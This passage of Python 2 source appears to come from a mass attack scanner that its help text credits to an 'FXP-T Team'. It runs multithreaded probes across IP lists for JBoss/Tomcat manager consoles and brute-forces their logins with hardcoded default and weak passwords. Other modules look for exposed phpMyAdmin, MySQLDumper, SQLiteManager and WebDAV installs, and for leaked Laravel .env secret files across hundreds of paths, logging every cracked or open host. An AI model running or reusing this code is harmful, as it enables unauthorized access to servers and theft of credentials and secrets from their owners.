"/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = ['', '102030', '112233', '123', '123123', '1234', '12345', '123456', '1234567', '12345678', '123456789', '1234567890', '1q2w3e4r', '321321', '654321', '666666', 'Password', 'Password1', 'Password12', 'Password123', 'abc123', 'access', 'admin', 'admin01','admin123', 'admin1234', 'admin123456', '[email protected]', 'adminadmin', 'blah', 'both', 'changethis', 'demo', 'demo123', 'hello', 'manager', 'pass', 'pass123', 'pass1234', 'passw0rd', 'password', 'password1', 'password12', 'password123', 'qwert', 'qwerty', 'qwertz', 'qwerty123', 'role', 'root', 's3cret', 'secret', 't0mcat', 'test', 'tomcat', 'toor', 'welcome', 'xmagico', 'zx321654xz'] main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: tpwdx = tpwd.strip() if tools().http_basic_auth(target_url, tadmin, tpwdx)[0] == True: result_line += " Account:" + tadmin + "/" + tpwdx print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwdx tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwdx else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx3(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx3_secured.txt", "log_usec_result_file" : "log_jmx3_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx3.txt", "log_bruted_result_file" : "log_jmx3_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = open('passwords_unix.txt', 'r').read().splitlines() main_url = tools().create_http_url(ip, port, file = "", prot = "http") for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: if tools().http_basic_auth(target_url, tadmin, tpwd)[0] == True: result_line += " Account:" + tadmin + "/" + tpwd print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwd tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwd else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) def module_scan_mysqldumper(self, ip, port): ############################################################# # Scan Hosts for installed MySQLDumper and log them ############################################################# __info__ = {"name" : "mysqldumper", "log_usec_result_file" : "usec_result_msd.txt", "log_sec_result_file" : "sec_results_msd.txt", "log_unknwn_result_file" : "unknwn_results_msd.txt", "paths" : ["/Dumper", "/MSD", "/MySQL", "/MySQLDumper", "/dumper", "/msd", "/msd1.24.4", "/msd1.24stable", "/mySQLDumper", "/mySQLmanager", "/mySqlDumper", "/mysql", "/mysqldumper", "/sql", "/sqladmin", "/sqlmanager", "/sqlweb", "/websql"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("<title>MySQLDumper</title>") != -1: print "[*] MSD (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] MSD (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_phpmyadmin(self, ip, port): ############################################################# # Scan Hosts for phpmyadmin and log them ############################################################# __info__ = {"name" : "phpmyadmin", "log_usec_result_file" : "usec_result_pma.txt", "log_sec_result_file" : "sec_results_pma.txt", "log_unknwn_result_file" : "unknwn_results_pma.txt", "paths" : ["/phpmyadmin", "/phpMyAdmin", "/mysql", "/sql", "/myadmin", "/phpMyAdmin-4.2.1-all-languages", "/phpMyAdmin-4.2.1-english", "/xampp/phpmyadmin", "/typo3/phpmyadmin", "/webadmin"], "mark_usec" : ["<li id=\"li_server_info\">Server: ", "src=\"navigation.php", "src=\"main.php"], "mark_sec" : ["www.phpmyadmin.net", "input_username", "pma_username", "pma_password", "src=\"main.php?token="], "mark_blacklist" : ["<?php", "<?"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured #print target_return[3] # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['mark_usec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) elif any(k in target_return[3] for k in __info__['mark_sec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) else: print "[*] PMA (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_sqlitemanager(self, ip, port): ############################################################# # Scan for sqlitemanager and log them ############################################################# __info__ = {"name" : "sqlitemanager", "log_result_file" : "log_sqlitemanager.txt", "log_unknwn_result_file" : "unknwn_results_sqlitemanager.txt", "paths" : ["/sqlite", "/SQLite/SQLiteManager-1.2.4", "/SQLiteManager-1.2.4", "/sqlitemanager", "/SQlite", "/SQLiteManager"], "marks" : ["Create or add new database", "<h2 class=\"sqlmVersion\">Welcome to", "http://www.sqlitemanager.org"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/main.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[1] == 200: result_line = "%s Server: %s" %(target_url, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): sys.stdout.write("[*] Sqlitemanager: %s\n" %target_url) tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_webdav(self, ip, port): ############################################################# # Scan for webdav and log them ############################################################# __info__ = {"name" : "webdav", "log_result_file" : "log_webdav.txt", "log_unknwn_result_file" : "unknwn_results_webdav.txt", "paths" : ["/webdav"], "mark_xampp" : ["<b>WebDAV testpage</b>"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: if any(k in target_return[3] for k in __info__['mark_xampp']): print "[*] WebDAV (TRUE):", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] WebDAV (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_laravel(self, ip, port): ############################################################# #Scan for laravel by [email protected]@R-LightS ############################################################# __info__ = {"name" : "laravel", "log_result_file" : "log_laravel.txt", "log_unknwn_result_file" : "unknwn_results_laravel.txt", "paths" : [ "/.env", "/__tests__/test-become/.env", "/_static/.env", "/.c9/metadata/environment/.env", "/.docker/.env", "/.docker/laravel/app/.env", "/.env.backup", "/.env.dev", "/.env.development.local", "/.env.docker.dev", "/.env.example", "/.env.local", "/.env.php", "/.env.prod", "/.env.production.local", "/.env.sample.php", "/.env.save", "/.env.stage", "/.env.test", "/.env.test.local", "/.env~", "/.gitlab-ci/.env", "/.vscode/.env", "/3-sequelize/final/.env", "/07-accessing-data/begin/vue-heroes/.env", "/07-accessing-data/end/vue-heroes/.env", "/08-routing/begin/vue-heroes/.env", "/08-routing/end/vue-heroes/.env", "/09-managing-state/begin/vue-heroes/.env", "/09-managing-state/end/vue-heroes/.env", "/31_structure_tests/.env", "/acme_challenges/.env", "/acme-challenge/.env", "/acme/.env", "/actions-server/.env", "/admin-app/.env", "/admin/.env", "/adminer/.env", "/administrator/.env", "/agora/.env", "/alpha/.env", "/anaconda/.env", "/api/.env", "/api/src/.env", "/app_dir/.env", "/app_nginx_static_path/.env", "/app-order-client/.env", "/app/.env", "/app/client/.env", "/app/code/community/Nosto/Tagging/.env", "/app/config/.env", "/app/config/dev/.env", "/app/frontend/.env", "/app1-static/.env", "/app2-static/.env", "/apps/.env", "/apps/client/.env", "/Archipel/.env", "/asset_img/.env", "/assets/.env", "/Assignment3/.env", "/Assignment4/.env", "/audio/.env", "/awstats/.env", "/babel-plugin-dotenv/test/fixtures/as-alias/.env", "/babel-plugin-dotenv/test/fixtures/default/.env", "/babel-plugin-dotenv/test/fixtures/dev-env/.env", "/babel-plugin-dotenv/test/fixtures/empty-values/.env", "/babel-plugin-dotenv/test/fixtures/filename/.env", "/babel-plugin-dotenv/test/fixtures/override-value/.env", "/babel-plugin-dotenv/test/fixtures/prod-env/.env", "/back-end/app/.env", "/back/.env", "/backend/.env", "/backend/src/.env", "/backendfinaltest/.env", "/backup/.env", "/base_dir/.env", "/basic-network/.env", "/bgoldd/.env", "/bitcoind/.env", "/blankon/.env", "/blob/.env", "/blog/.env", "/blue/.env", "/bookchain-client/.env", "/bootstrap/.env", "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env", "/boxes/oracle-vagrant-boxes/Kubernetes/.env", "/boxes/oracle-vagrant-boxes/OLCNE/.env", "/bucoffea/.env", "/build/.env", "/cardea/backend/.env", "/cdw-backend/.env", "/cgi-bin/.env", "/ch2-mytodo/.env", "/ch6-mytodo/.env", "/ch6a-mytodo/.env", "/ch7-mytodo/.env", "/ch7a-mytodo/.env", "/ch8-mytodo/.env", "/ch8a-mytodo/.env", "/ch8b-mytodo/.env", "/Chai/.env", "/challenge/.env", "/challenges/.env", "/charts/liveObjects/.env", "/chat-client/.env", "/chiminey/.env", "/client-app/.env", "/client/.env", "/client/mutual-fund-app/.env", "/client/src/.env", "/ClientApp/.env", "/clld_dir/.env", "/cmd/testdata/expected/dot_env/.env", "/code/api/.env", "/code/web/.env", "/CodeGolf.Web/ClientApp/.env", "/codenames-frontend/.env", "/collab-connect-web-application/server/.env", "/collected_static/.env", "/community/.env", "/conf/.env", "/config/.env", "/ContainerRegistry/.env", "/content/.env", "/core/.env", "/core/app/.env", "/core/Datavase/.env", "/core/persistence/.env", "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env", "/counterblockd/.env", "/counterwallet/.env", "/cp/.env", "/cron/.env", "/cronlab/.env", "/cryo_project/.env", "/css/.env", "/custom/.env", "/d/.env", "/data/.env", "/database/.env", "/dataset1/.env", "/dataset2/.env", "/default/.env", "/delivery/.env", "/demo-app/.env", "/demo/.env", "/deploy/.env", "/developerslv/.env", "/development/.env", "/directories/.env", "/dist/.env", "/django_project_path/.env", "/django-blog/.env", "/django/.env", "/doc/.env", "/docker-compose/platform/.env", "/docker-elk/.env", "/docker-network-healthcheck/.env", "/docker-node-mongo-redis/.env", "/docker/.env", "/docker/app/.env", "/docker/compose/withMongo/.env", "/docker/compose/withPostgres/.env", "/docker/database/.env", "/docker/db/.env", "/docker/examples/compose/.env", "/docker/postgres/.env", "/docker/webdav/.env", "/docs/.env", "/dodoswap-client/.env", "/dotfiles/.env", "/download/.env", "/downloads/.env", "/e2e/.env", "/en/.env", "/engine/.env", "/env/.env", "/env/dockers/mariadb-test/.env", "/env/dockers/php-apache/.env", "/env/example/.env", "/env/template/.env", "/environments/local/.env", "/environments/production/.env", "/error/.env", "/errors/.env", "/example/.env", "/example02-golang-package/import-underscore/.env", "/example27-how-to-load-env/sample01/.env", "/example27-how-to-load-env/sample02/.env", "/examples/.env", "/examples/01-simple-model/.env", "/examples/02-complex-example/.env", "/examples/03-one-to-many-relationship/.env", "/examples/04-many-to-many-relationship/.env", "/examples/05-migrations/.env", "/examples/06-base-service/.env", "/examples/07-feature-flags/.env", "/examples/08-performance/.env", "/examples/09-production/.env", "/examples/10-subscriptions/.env", "/examples/11-transactions/.env", "/examples/drupal-separate-services/.env", "/examples/react-dashboard/backend/.env", "/examples/sdl-first/.env", "/examples/sdl-first/prisma/.env", "/examples/vue-dashboard/backend/.env", "/examples/web/.env", "/examples/with-cookie-auth-fauna/.env", "/examples/with-dotenv/.env", "/examples/with-firebase-authentication-serverless/.env", "/examples/with-react-relay-network-modern/.env", "/examples/with-relay-modern/.env", "/examples/with-universal-configuration-build-time/.env", "/exapi/.env", "/Exercise.Frontend/.env", "/Exercise.Frontend/train/.env", "/export/.env", "/fastlane/.env", "/favicons/.env", "/favs/.env", "/FE/huey/.env", "/fedex/.env", "/fhir-api/.env", "/files/.env", "/fileserver/.env", "/films/.env", "/Final_Project/Airflow_Dag/.env", "/Final_Project/kafka_twitter/.env", "/Final_Project/StartingFile/.env", "/finalVersion/lcomernbootcamp/projbackend/.env", "/FIRST_CONFIG/.env", "/first-network/.env", "/fisdom/fisdom/.env", "/fixtures/blocks/.env", "/fixtures/fiber-debugger/.env", "/fixtures/flight/.env", "/fixtures/kitchensink/.env", "/flask_test_uploads/.env", "/fm/.env", "/font-icons/.env", "/fonts/.env", "/front-app/.env", "/front-empathy/.env", "/front-end/.env", "/front/.env", "/front/src/.env", "/frontend/.env", "/frontend/momentum-fe/.env", "/frontend/react/.env", "/frontend/vue/.env", "/frontendfinaltest/.env", "/ftp/.env", "/ftpmaster/.env", "/gists/cache", "/gists/laravel", "/gists/pusher", "/github-connect/.env", "/grems-api/.env", "/grems-frontend/.env", "/Hash/.env", "/hasura/.env", "/Helmetjs/.env", "/hgs-static/.env", "/higlass-website/.env", "/home/.env", "/horde/.env", "/hotpot-app-frontend/.env", "/htdocs/.env", "/html/.env", "/http/.env", "/httpboot/.env", "/HUNIV_migration/.env", "/icon/.env", "/icons/.env", "/ikiwiki/.env", "/image_data/.env", "/Imagebord/.env", "/images/.env", "/img/.env", "/install/.env", "/InstantCV/server/.env", "/items/.env", "/javascript/.env", "/js-plugin/.env", "/js/.env", "/jsrelay/.env", "/jupyter/.env", "/khanlinks/.env", "/kibana/.env", "/kodenames-server/.env", "/kolab-syncroton/.env", "/Kubernetes/.env", "/lab/.env", "/laravel/.env", "/latest/.env", "/layout/.env", "/lcomernbootcamp/projbackend/.env", "/leafer-app/.env", "/ledger_sync/.env", "/legacy/tests/9.1.1", "/legacy/tests/9.2.0", "/legal/.env", "/lemonldap-ng-doc/.env", "/lemonldap-ng-fr-doc/.env", "/letsencrypt/.env", "/lib/.env", "/Library/.env", "/libs/.env", "/linux/.env", "/local/.env", "/log/.env", "/logging/.env", "/login/.env", "/mail/.env", "/mailinabox/.env", "/mailman/.env", "/main_user/.env", "/main/.env", "/manual/.env", "/master/.env", "/media/.env", "/memcached/.env", "/mentorg-lava-docker/.env", "/micro-app-react-communication/.env", "/micro-app-react/.env", "/mindsweeper/gui/.env", "/minified/.env", "/misc/.env", "/Modix/ClientApp/.env", "/monerod/.env", "/mongodb/config/dev/.env", "/monitoring/compose/.env", "/moodledata/.env", "/msks/.env", "/munki_repo/.env", "/music/.env", "/MyRentals.Web/ClientApp/.env", "/name/.env", "/new-js/.env", "/news-app/.env", "/nginx-server/.env", "/nginx/.env", "/niffler-frontend/.env", "/node_modules/.env", "/Nodejs-Projects/play-ground/login/.env", "/Nodejs-Projects/play-ground/ManageUserRoles/.env", "/noVNC/.env", "/Nuke.App.Ui/.env", "/oldsanta/.env", "/ops/vagrant/.env", "/option/.env", "/orientdb-client/.env", "/outputs/.env", "/owncloud/.env", "/packages/api/.env", "/packages/app/.env", "/packages/client/.env", "/packages/frontend/.env", "/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env", "/packages/plugin-qiankun/examples/app1/.env", "/packages/plugin-qiankun/examples/app2/.env", "/packages/plugin-qiankun/examples/app3/.env", "/packages/plugin-qiankun/examples/master/.env", "/packages/react-scripts/fixtures/kitchensink/template/.env", "/packages/styled-ui-docs/.env", "/packages/web/.env", "/packed/.env", "/page-editor/.env", "/parity/.env", "/Passportjs/.env", "/patchwork/.env", "/path/.env", "/pfbe/.env", "/pictures/.env", "/playground/.env", "/plugin_static/.env", "/post-deployment/.vscode/.env", "/postfixadmin/.env", "/price_hawk_client/.env", "/prisma/.env", "/private/.env", "/processor/.env", "/prod/.env", "/projbackend/.env", "/project_root/.env", "/psnlink/.env", "/pt2/countries/src/.env", "/pt8/library-backend-gql/.env", "/pub/.env", "/public_html/.env", "/public_root/.env", "/public/.env", "/question2/.env", "/qv-frontend/.env", "/rabbitmq-cluster/.env", "/rails-api/react-app/.env", "/rasax/.env", "/react_todo/.env", "/redmine/.env", "/repo/.env", "/repos/.env", "/repository/.env", "/resources/.env", "/resources/docker/.env", "/resources/docker/mysql/.env", "/resources/docker/phpmyadmin/.env", "/resources/docker/rabbitmq/.env", "/resources/docker/rediscommander/.env", "/resourcesync/.env", "/rest/.env", "/restapi/.env", "/results/.env", "/robots/.env", "/root/.env", "/rosterBack/.env", "/roundcube/.env", "/roundcubemail/.env", "/routes/.env", "/run/.env", "/rust-backend/.env", "/rust-backend/dao/.env", "/s-with-me-front/.env", "/saas/.env", "/samples/chatroom/chatroom-spa/.env", "/samples/docker/deploymentscripts/.env", "/script/.env", "/scripts/.env", "/scripts/fvt/.env", "/selfish-darling-backend/.env", "/Serve_time_server/.env", "/serve-browserbench/.env", "/Server_with_db/.env", "/server/.env", "/server/config/.env", "/server/laravel/.env", "/server/src/persistence/.env", "/services/adminer/.env", "/services/deployment-agent/.env", "/services/documents/.env", "/services/graylog/.env", "/services/jaeger/.env", "/services/minio/.env", "/services/monitoring/.env", "/services/portainer/.env", "/services/redis-commander/.env", "/services/registry/.env", "/services/simcore/.env", "/services/traefik/.env", "/sessions/.env", "/shared/.env", "/shibboleth/.env", "/shop/.env", "/Simple_server/.env", "/site-library/.env", "/site/.env", "/sitemaps/.env", "/sites/.env", "/sitestatic/.env", "/Socketio/.env", "/sources/.env", "/Sources/API/.env", "/spearmint/.env", "/spikes/config-material-app/.env", "/SpotiApps/.env", "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env", "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env", "/src/__tests__/__fixtures__/typeScriptProject/.env", "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env", "/src/.env", "/src/add-auth/express/.env", "/src/assembly/.env", "/src/character-service/.env", "/src/client/mobile/.env", "/src/core/tests/dotenv-files/.env", "/src/gameprovider-service/.env", "/src/main/front-end/.env", "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env", "/src/renderer/.env", "/srv6_controller/controller/.env", "/srv6_controller/examples/.env", "/srv6_controller/node-manager/.env", "/st-js-be-2020-movies-two/.env", "/stackato-pkg/.env", "/static_prod/.env", "/static_root/.env", "/static_user/.env", "/static-collected/.env", "/static-html/.env", "/static-root/.env", "/static/.env", "/staticfiles/.env", "/stats/.env", "/storage/.env", "/style/.env", "/styles/.env", "/stylesheets/.env", "/symfony/.env", "/system-config/.env", "/system/.env", "/target/.env", "/temanr9/.env", "/temanr10/.env", "/temp/.env", "/template/.env", "/templates/.env", "/test-network/.env", "/test-network/addOrg3/.env", "/test/.env", "/test/aries-js-worker/fixtures/.env", "/test/bdd/fixtures/adapter-rest/.env", "/test/bdd/fixtures/agent-rest/.env", "/test/bdd/fixtures/couchdb/.env", "/test/bdd/fixtures/demo/.env", "/test/bdd/fixtures/demo/openapi/.env", "/test/bdd/fixtures/did-method-rest/.env", "/test/bdd/fixtures/did-rest/.env", "/test/bdd/fixtures/edv-rest/.env", "/test/bdd/fixtures/openapi-demo/.env", "/test/bdd/fixtures/sidetree-mock/.env", "/test/bdd/fixtures/universalresolver/.env", "/test/bdd/fixtures/vc-rest/.env", "/test/fixtures/.env", "/test/fixtures/app_types/node/.env", "/test/fixtures/app_types/rails/.env", "/test/fixtures/node_path/.env", "/test/integration/env-config/app/.env", "/testfiles/.env", "/testing/docker/.env", "/tests/.env", "/Tests/Application/.env", "/tests/default_settings/v7.0/.env", "/tests/default_settings/v8.0/.env", "/tests/default_settings/v9.0/.env", "/tests/default_settings/v10.0/.env", "/tests/default_settings/v11.0/.env", "/tests/default_settings/v12.0/.env", "/tests/default_settings/v13.0/.env", "/tests/drupal-test/.env", "/tests/Integration/Environment/.env", "/tests/todo-react/.env", "/testwork_json/.env", "/theme_static/.env", "/theme/.env", "/thumb/.env", "/thumbs/.env", "/tiedostot/.env", "/tmp/.env", "/tools/.env", "/Travel_form/.env", "/ts/prime/.env", "/ubuntu/.env", "/ui/.env", "/unixtime/.env", "/unsplash-downloader/.env", "/upfiles/.env", "/upload/.env", "/uploads/.env", "/urlmem-app/.env", "/User_info/.env", "/v1/.env", "/v2/.env", "/var/backup/.env", "/vendor/.env", "/vendor/github.com/gobuffalo/envy/.env", "/vendor/github.com/subosito/gotenv/.env", "/videos/.env", "/vm-docker-compose/.env", "/vod_installer/.env", "/vue_CRM/.env", "/vue-end/vue-til/.env", "/vue/vuecli/.env", "/web-dist/.env", "/web/.env", "/Web/siteMariage/.env", "/webroot_path/.env", "/websocket/.env", "/webstatic/.env", "/webui/.env", "/well-known/.env", "/whturk/.env", "/windows/tests/9.2.x/.env", "/windows/tests/9.3.x/.env", "/wp-content/.env", "/www-data/.env", "/www/.env", "/xx-final/vue-heroes/.env", "/zmusic-frontend/.env"], "marks" : ["Laravel", "laravel", "https://laravel.com/", "https://laracon.eu/online/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] laravel:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) class main(): """ Main part which controls the complete program """ def __init__(self, file, timeout = 10): self.file = read_file_ip(file) global scan scan = scan(timeout) def run(self, threads): threads = int(threads) print "\n" print "[INFO] Scanning with %s Thread(s)\n" %threads while True: line = self.file.next_line() if line == False: break while True: if threading.active_count() <= threads: ip_port = line.split(":") if(re.match("((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)",ip_port[0]) != None): ip = ip_port[0] port = ip_port[1].split(" ")[0] t = threading.Thread(target=scan.check, args=(ip, port)) t.deamon = False t.start() break else: break return True if __name__ == "__main__": __version__ = "by FXP-T Team - www.fxp-terminal.info" def help(): print "--------------------------------------------------------------------" print " Schm3ckm0-Ch3ck3R v0.5 " print "- .py <file> results.txt <threads> [timeout] " print "-- *** " print "- Respect to: " print " " print "- ddr, b2r, bwc, il, maro, burnz, chucky, " print "- gil, bebop, Gnu, airy, fake, " print "- dodo, mani, Buster and all i foget :D " print "-- *** " print "- " print "- Respect to: " print "- FXP-T Team, [email protected]@R-LightS and Friends, moep, izibitzi, Stylez " print " " print " < Changelog > " print " " print " " print " " print " " print " 28.01.2021 - SSLError Fix , True, False and None , durch getestet " print "-18.01.2021 - diverse path erweiterungen------------------------- " print "-18.01.2021 - module_scan_laravel_and_phpunit hinzugefügt-------- " print "-01.10.2020 - Adminer modul hinzugefügt-------------------------- " print " 03.10.2020 - Scan module erweitert------------------------------ " print " 